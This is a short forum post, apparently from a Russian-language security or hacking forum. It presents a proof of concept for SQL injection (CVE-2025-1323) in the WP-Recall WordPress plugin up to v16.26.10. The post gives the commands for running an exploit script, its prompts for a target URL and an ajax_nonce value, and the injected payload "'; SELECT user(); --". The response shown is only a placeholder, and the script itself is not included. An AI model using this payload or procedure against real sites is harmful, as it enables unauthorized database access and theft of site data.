CVE-2025-1323 WP-Recall plugin sqli

SpecIT

Well-known member
Регистрация
3 Фев 2025
Сообщения
56
Реакции
12
WP-Recall ≤ v16.26.10
poc:

pip install requests

python CVE-2025-1323.py

Enter target URL (e.g. ):
Enter ajax_nonce value: 37c11b0c06

[*] Sending payload: '; SELECT user(); --

[+] Response received:
{"result":"SQL error or leaked data here..."}
 
Сверху